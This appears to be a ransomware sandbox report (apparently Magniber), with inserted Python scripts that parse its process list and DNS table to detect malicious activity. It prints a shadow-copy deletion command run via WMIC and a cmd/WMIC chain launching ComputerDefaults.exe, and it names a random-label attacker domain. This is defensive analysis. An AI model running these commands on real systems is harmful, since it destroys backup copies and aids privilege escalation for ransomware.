"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:1

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1284 /prefetch:2
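The process list above is the core of the report: WMIC `process call create` is used as a launcher, once to run `vssadmin.exe Delete Shadows /all /quiet` (the "Deletes shadow copies" signature) and once to run `cmd /c computerdefaults.exe`. The following script is an added example, not part of the sandbox report: it parses the Path / Command-line pairs in the report's own layout and flags that chain. The SAMPLE block is a constructed subset of the entries above; the rules, the ATT&CK mappings and the reading of ComputerDefaults.exe as an auto-elevate launch are the editor's assumptions.

```python
"""Detection walk-through for the process list above.

Added example, not part of the sandbox report.  SAMPLE is a constructed
subset of the report's Path / Command-line pairs; the rules and ATT&CK
mappings are the editor's assumptions, written so the same parser can be
run over the complete list.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    image: str      # executable path as reported
    cmdline: str    # full command line as reported


# Constructed sample: one copy of each distinct process in the report's chain.
SAMPLE = r"""
C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
"""

# The command WMIC was asked to start is the last quoted argument.
WMIC_CREATE = re.compile(r'process\s+call\s+create\s+"(.*)"\s*$', re.IGNORECASE)


def parse_process_list(text: str) -> list[Proc]:
    """The report alternates a path line and a command-line line, separated
    by blank lines: drop the blanks and pair what is left."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    if len(lines) % 2:
        raise ValueError("odd number of non-blank lines: unmatched path/command line")
    return [Proc(lines[i], lines[i + 1]) for i in range(0, len(lines), 2)]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(procs: list[Proc]) -> tuple[list[tuple[str, str, Proc]], list[str]]:
    """Return (findings, wmic_targets); a finding is (ATT&CK id, text, process)."""
    findings, wmic_targets = [], []
    for p in procs:
        name = basename(p.image)
        cl = p.cmdline.lower()
        if name == "vssadmin.exe" and "delete" in cl and "shadows" in cl:
            findings.append(("T1490", "vssadmin deletes shadow copies (/all /quiet)", p))
        elif name == "wmic.exe":
            m = WMIC_CREATE.search(p.cmdline)
            if m:
                wmic_targets.append(m.group(1))
                findings.append(("T1047", f"WMIC used as a launcher for: {m.group(1)}", p))
        elif name == "cmd.exe" and "process call create" in cl:
            findings.append(("T1059.003", "cmd.exe wraps a WMIC process-create call", p))
        elif name == "computerdefaults.exe":
            # Auto-elevating Settings helper started from a cmd/WMIC chain rather
            # than from the shell: consistent with a UAC-bypass launch.  Editor's
            # assumption; the report itself only says "unexpected child process".
            findings.append(("T1548.002", "auto-elevating ComputerDefaults.exe spawned by cmd", p))
    return findings, wmic_targets


def verdict(procs: list[Proc]) -> dict[str, bool]:
    """Pair the WMIC request with the vssadmin execution so the shadow-copy
    verdict needs both the ask and the actual run."""
    findings, targets = triage(procs)
    ids = {f[0] for f in findings}
    asked = any("vssadmin" in t.lower() and "delete shadows" in t.lower() for t in targets)
    return {
        "shadow_copies_deleted": "T1490" in ids and asked,
        "wmic_as_launcher": "T1047" in ids,
        "auto_elevate_binary": "T1548.002" in ids,
    }


if __name__ == "__main__":
    procs = parse_process_list(SAMPLE)
    for tid, desc, p in triage(procs)[0]:
        print(f"{tid:10} {desc}\n           {p.cmdline}")
    print(verdict(procs))
```

Run over the full list above, the parser treats every repeated entry as a separate process, which is what the report shows (the same chain is launched many times); the verdict only turns `shadow_copies_deleted` on when a WMIC call requested the deletion and a vssadmin process with the matching command line actually ran, so a blocked or failed launch would not be reported as a completed defence-impairment step.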

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 udp
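Most rows in the Network table are reverse (PTR) lookups and two are for google.com; the only domain worth following up is 2cc03a300254d290c0diteiyb.topsaid.site, queried four times, whose leftmost label is a long random-looking token of the kind Magniber uses to identify a victim. The script below is an added example, not part of the sandbox report: it parses the table as printed, separates the noise from forward lookups, and surfaces long high-entropy labels. NETWORK_TABLE is the table copied in as constructed input; the classification and the entropy/length thresholds are the editor's assumptions.

```python
"""DNS triage over the Network table above.

Added example, not part of the sandbox report.  NETWORK_TABLE is the table
copied in as constructed input; the classification and the random-label
heuristic are the editor's assumptions, not something the sandbox asserts.
"""
import math
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 2cc03a300254d290c0diteiyb.topsaid.site udp
US 8.8.8.8:53 udp
"""


@dataclass(frozen=True)
class Query:
    country: str
    dest: str                # resolver or multicast address:port
    domain: Optional[str]    # None when the sandbox left the column empty
    proto: str


def parse_table(text: str) -> list[Query]:
    rows = []
    for line in text.splitlines()[1:]:          # first line is the header
        parts = line.split()
        if not parts:
            continue
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:                   # empty Domain column
            country, dest, proto = parts
            domain = None
        else:
            raise ValueError(f"unexpected row: {line!r}")
        rows.append(Query(country, dest, domain, proto))
    return rows


def classify(q: Query) -> str:
    if q.domain is None:
        return "mdns" if q.dest.endswith(":5353") else "no_domain"
    if q.domain.endswith(".in-addr.arpa"):
        return "reverse_lookup"                 # PTR noise from the OS/browser
    return "forward_lookup"


def summarize(rows: list[Query]) -> dict[str, int]:
    return dict(Counter(classify(q) for q in rows))


def label_entropy(label: str) -> float:
    """Shannon entropy, in bits per character, of one DNS label."""
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


RANDOM_LABEL = re.compile(r"^[a-z0-9]{20,}$")


def suspicious_domains(rows: list[Query], min_entropy: float = 3.0) -> dict[str, int]:
    """Forward lookups whose leftmost label is a long, high-entropy alphanumeric
    token, with their query counts.  Aimed at the victim-ID style hostnames
    Magniber payment sites use; length and entropy thresholds are editor's
    assumptions, not values taken from the report."""
    counts = Counter(q.domain for q in rows if classify(q) == "forward_lookup")
    hits = {}
    for domain, n in counts.items():
        label = domain.split(".")[0].lower()
        if RANDOM_LABEL.match(label) and label_entropy(label) >= min_entropy:
            hits[domain] = n
    return hits


if __name__ == "__main__":
    rows = parse_table(NETWORK_TABLE)
    print(summarize(rows))
    print(suspicious_domains(rows))
```

The last row of the table has no domain at all and is kept as `no_domain` rather than guessed; the mDNS row to 224.0.0.251:5353 is separated for the same reason. The heuristic is deliberately narrow (one long alphanumeric label, entropy above 3 bits per character) so that ordinary CDN hostnames with short labels do not trip it, but it should be read as a triage filter that points at a domain to block and sinkhole, not as proof of command-and-control on its own.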

Files

memory/2196-1-0x000001FA1ED70000-0x000001FA1ED71000-memory.dmp

memory/2196-8-0x000001FA1F0C0000-0x000001FA1F0C1000-memory.dmp

memory/2196-11-0x000001FA1F1B0000-0x000001FA1F1B1000-memory.dmp

memory/2196-10-0x000001FA1F0F0000-0x000001FA1F0F1000-memory.dmp

memory/2196-9-0x000001FA1F0D0000-0x000001FA1F0D1000-memory.dmp

memory/2196-7-0x000001FA1EDD0000-0x000001FA1EDD1000-memory.dmp

memory/2196-6-0x000001FA1EDC0000-0x000001FA1EDC1000-memory.dmp

memory/2196-5-0x000001FA1EDB0000-0x000001FA1EDB1000-memory.dmp

memory/2196-4-0x000001FA1EDA0000-0x000001FA1EDA1000-memory.dmp

memory/2196-3-0x000001FA1ED90000-0x000001FA1ED91000-memory.dmp

memory/2868-12-0x00000193C3230000-0x00000193C3235000-memory.dmp

memory/2196-2-0x000001FA1ED80000-0x000001FA1ED81000-memory.dmp

memory/2196-0-0x000001FA1EE00000-0x000001FA1F091000-memory.dmp

C:\Users\Admin\Pictures\readme.txt

MD5 e56493345d1a19bf98c9a039c9c84a78
SHA1 b75e77b959f8293a51cf4b08b117f19cabbb8125
SHA256 fd397a29aa4c88d195700c983f83b617519931ac3b9088a7b8a550cbb557a129
SHA512 80c5008455079ef1c9ae6e135d69ee11d1858e75f841df3f975bb8b49acb39a4e1d524d78414a3028f39659b1c9019575fcd73a040f8592cced5ad1810c4fd0f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 37f660dd4b6ddf23bc37f5c823d1c33a
SHA1 1c35538aa307a3e09d15519df6ace99674ae428b
SHA256 4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8
SHA512 807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d7cb450b1315c63b1d5d89d98ba22da5
SHA1 694005cd9e1a4c54e0b83d0598a8a0c089df1556
SHA256 38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031
SHA512 df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

\??\pipe\LOCAL\crashpad_3800_OABNFMXUMRIAZBCX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 977be686a2fa95fd58d4b6e3cf0d7884
SHA1 015b35a6efef8e465a95cb40179e3319e71c293d
SHA256 e2b8da784d4db0fbe16761f0b81ef6414e4b84b233b63050e8023f3f86ef8812
SHA512 c996379e893026309127222dcad27261978ae233ca08117d7464cf810045578ce3c87bdd39f976ebb1a6f0a73b617f1fbc7fb8348741ae56ada237e6e5f5aae7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

MD5 8df5844e267d673ef38aae4bc04f3c6c
SHA1 d7f64595b4987c87c225c3a355254a17771ea344
SHA256 a7ec775ec7ff36f06de7d83a2015cb0c717bcfc35f66c689ee4a50a49a0e3f63
SHA512 4acc425a1815746f5196c1ebe05a90b5ab98c14460eed4430da10dc2b868dacd028453a4832df7ffe3e662094184416d3b91ba480f8dfab494850ab3182335f3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

MD5 d60f8cd0b7974f1debadde3a8351ac9b
SHA1 48dbf91954e109d51007e69b7f1c79311115917d
SHA256 8b5a809172aa21cab40b8c4eb25af0eb02ef2d865fcf6aaba9e46b97f589a6c3
SHA512 77f3690028a26aca4399f3d04428c9d4ecb69660d14eca3adb443ba33b5f6280630c49bcbfc39bd7ca7c5537106af368147d661dfb0b2a8a44c054ad9fc36ae1

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133778691422624591.txt

MD5 93ebc3ec5cf840b4509282e9d7ff10d4
SHA1 439a1063756dc26ef3330bac9d1897cb38c42fd6
SHA256 e8a625d967458734d9c5e03ca15cb52bc6e7ae828d4383821eb5583e0e8b06b4
SHA512 5f92e79500ed4cec65827c1f4d8ebd9ecf0bb5ed151c2c71309edfe8b09e8be7515fa6cfa34252e20e90aac76dd6d4521eacfcabfab9d4773fa553fd30109535

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

MD5 a39ce4b6fc5e33aa77f0d2a1a0a2962e
SHA1 c596884998bd6cdd8c60c240b1dbe05258dc2e4f
SHA256 261f067d9c2a8e99ea7e320b359a6df4882df4e253e419197c89a28474d18161
SHA512 e83ec508e31a1669a6bd49c8ae51a27925f3a4fb68ed4791adcecc2f6c766751307c94c8c601f942459c760a90e29f2e6a37b1e1106d2fdd0bf3e981d05e38bf

memory/3740-342-0x0000025C5A200000-0x0000025C5A208000-memory.dmp

memory/3740-343-0x0000025C5A170000-0x0000025C5A171000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d2e5e32a1d17ded5016384b9ad867305
SHA1 f8966c5225458996db4220aeedb4da819bdce46e
SHA256 f737e5e435f222b126cf9e38421e40626f7a397bde994c4f26763e3cc388a5df
SHA512 313959e6b0db24833253f2c5375c4163cd7d689b2818d09f368311a55b9d32f6cf1b612dea5aaafe9a8db096ab0ac9c79eb1b6114ccee17310e5e9f44194336f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 81b40971034dadfe5be7f6975a07ec89
SHA1 9780b8b91043a6e33538c694c0aacaf731371d8f
SHA256 b1a54f40dc5a1cfd9504e5e3cece5d4a8fe33b44f82a7c311e272bb89b1e0a92
SHA512 b2d1146fb479e1c6c644677892a1e44d5a805d9205f1aa756548be457cf7795a9b6d0a8a72bcaafee299c26ef2fd237245a5b38d86cc8f143dfd39496436043f

C:\Users\Public\readme.txt

MD5 718777534403cdcf89b5d9b5f4b2f141
SHA1 3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29
SHA256 619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb
SHA512 8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

memory/3740-476-0x0000025C5A260000-0x0000025C5A268000-memory.dmp